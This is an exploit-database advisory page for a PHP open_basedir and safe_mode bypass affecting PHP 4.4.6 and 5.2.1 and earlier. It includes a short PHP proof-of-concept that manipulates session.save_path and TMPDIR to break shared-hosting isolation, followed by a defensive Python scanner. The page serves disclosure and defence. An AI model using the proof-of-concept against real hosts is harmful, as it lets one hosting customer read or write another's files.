PHP open_basedir Restriction Bypass Vulnerability - exploit.company
vendor: PHP
by: Unknown
CVSS: 7.5 (HIGH)
open_basedir restriction-bypass
CWE: Unknown
Product Name: PHP
Affected Version From: PHP 4 up to and including 4.4.6, PHP 5 up to and including 5.2.1
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: php
Metasploit:
Other Scripts:
Platforms Tested: Unknown

PHP open_basedir Restriction Bypass Vulnerability

The PHP open_basedir restriction-bypass vulnerability allows attackers to access sensitive information or write files in unauthorized locations. This vulnerability is due to a design error. It can be exploited in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code. The 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other, but this vulnerability bypasses those restrictions.

Mitigation:

Upgrade to a version of PHP that is not affected by this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23183/info

PHP is prone to an 'open_basedir' restriction-bypass vulnerability due to a design error.

Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.

The following versions are vulnerable:

PHP 4 up to and including 4.4.6
PHP 5 up to and including 5.2.1 

<?php
  ini_set("session.save_path", "/sessions/user2/");
  putenv("TMPDIR=/sessions/user2/");
  ini_set("session.save_path", "");
  @session_start();
?>
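
A hosting operator can look for this from the defensive side. The Python sketch below is an added example, not part of the original advisory: it checks a PHP version against the affected ranges listed above and flags scripts that combine the two calls seen in the proof-of-concept. The function names, result labels and the benign sample are made up for illustration.

```python
import re

# Inclusive upper bounds of the affected ranges listed in the advisory.
AFFECTED_MAX = {4: (4, 4, 6), 5: (5, 2, 1)}

# putenv("TMPDIR=...") with either quote style.
PUTENV_TMPDIR = re.compile(r"""putenv\s*\(\s*['"]\s*TMPDIR\s*=""", re.I)
# ini_set("session.save_path", "") with an empty value.
EMPTY_SAVE_PATH = re.compile(
    r"""ini_set\s*\(\s*['"]session\.save_path['"]\s*,\s*(?:''|"")\s*\)""", re.I)

# The proof-of-concept from this page, used here only as scanner input.
POC = '''<?php
  ini_set("session.save_path", "/sessions/user2/");
  putenv("TMPDIR=/sessions/user2/");
  ini_set("session.save_path", "");
  @session_start();
?>'''

# Constructed benign sample: a script that only sets its own save path.
BENIGN = '''<?php
  ini_set("session.save_path", "/sessions/user1/");
  session_start();
?>'''

def version_affected(version):
    """True if the PHP version is inside the advisory's affected ranges."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError("unrecognised PHP version: %r" % version)
    v = tuple(int(x) for x in m.groups())
    limit = AFFECTED_MAX.get(v[0])
    return limit is not None and v <= limit

def scan_source(src):
    """Return which of the two proof-of-concept calls appear in src."""
    hits = []
    if PUTENV_TMPDIR.search(src):
        hits.append("putenv-TMPDIR")
    if EMPTY_SAVE_PATH.search(src):
        hits.append("empty-session.save_path")
    return hits

def triage(php_version, src):
    """Hypothetical labels: both calls present matters most on affected PHP."""
    if len(scan_source(src)) < 2:
        return "no-match"
    return "affected-host" if version_affected(php_version) else "patched-host"

if __name__ == "__main__":
    print(triage("5.2.1", POC), triage("5.2.2", POC), triage("5.2.1", BENIGN))
```

The pattern match is textual, so a hit is a reason to review the script rather than proof of abuse.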